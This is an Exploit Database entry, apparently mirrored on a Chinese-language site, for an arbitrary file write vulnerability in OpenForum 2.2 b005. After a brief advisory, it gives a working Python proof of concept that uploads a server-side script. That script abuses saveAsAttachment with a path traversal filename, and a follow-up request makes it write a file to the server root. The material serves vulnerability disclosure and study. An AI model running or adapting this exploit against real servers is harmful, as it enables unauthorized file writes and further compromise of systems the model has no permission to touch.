OpenForum 2.2 b005 – ‘saveAsAttachment()’ Method Arbitrary File Creation

• Exploit Database
• 14 阅读

• 作者： John Leitch
  日期： 2010-05-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34035/

• # source: https://www.securityfocus.com/bid/40364/info
  # 
  # OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
  # 
  # Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
  #
  # OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
  #
  
  #============================================================================================================#
  # __ __ __ ________________ __ _____ _________ __#
  #/_/\/\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ (/_/\__/\) ___ ( /_/\/\_\ /\_____\/_/\__/\#
  #) ) )( ( ( \/_/( ( (( ( ( \(_____\// /\_/\ \ ) ) ) ) )/ /\_/\ \) ) )( ( (( (_____/) ) ) ) ) #
  # /_/ //\\ \_\ /\_\\ \_\\ \_\/ / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/#
  # \ \ /\ / // / // / /__/ / /__ ( ( (\ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ /\ / // /__/_\ \ \ \ \#
  #)_) /\ (_(( (_(( (_____(( (_____( \ \ \\ \/_\/ / )_) )\ \/_\/ /)_) /\ (_(( (_____\)_) ) \ \ #
  #\_\/\/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____(\_\/)_____( \_\/\/_/ \/_____/\_\/ \_\/ #
  ##
  #============================================================================================================#
  ##
  # Vulnerability............Arbitrary File Write#
  # Software.................Open Forum Server 2.2 b005#
  # Download.................http://code.google.com/p/open-forum #
  # Date.....................5/23/10 #
  ##
  #============================================================================================================#
  ##
  # Site.....................http://cross-site-scripting.blogspot.com/ #
  # Email....................john.leitch5@gmail.com#
  ##
  #============================================================================================================#
  ##
  # ##Description###
  ##
  # An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be#
  # exploited to write to the local file system of the server. #
  ##
  ##
  # ##Exploit###
  ##
  # Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder.#
  ##
  ##
  # ##Proof of Concept## #
  ##
  import sys, socket
  host = 'localhost'
  port = 80
  
  def send_request(request):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.settimeout(32) # sometimes it takes a while
  s.connect((host, port))
  s.send(request)
  
  response = s.recv(8192) + s.recv(8192) # a hack within a hack 
  
  return response
  
  def write_file():
  try:
  content = '----x--\r\n'\
  'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\
  'Content-Type: application/octet-stream\r\n\r\n'\
  'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\
  'data = "hello, world";\r\n'\
  'user = transaction.getUser();\r\n'\
  'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\
  'transaction.sendPage("File Written");\r\n\r\n'\
  '----x----\r\n'
  
  response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n'
  'Host: ' + host + '\r\n'
  'Content-Type: multipart/form-data; boundary=--x--\r\n'
  'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content)
  
  if 'HTTP/1.1 302 Redirect' not in response:
  print 'Error writing get.sjs'
  return
  else: print 'get.sjs created'
  
  response = send_request('GET OpenForum HTTP/1.1\r\n'
  'Host: ' + host + '\r\n\r\n')
  
  if 'File Written' not in response:
  print 'Error writing to root'
  return
  else: print 'x.txt created in root'
  
  except Exception:
  print sys.exc_info()
  
  write_file()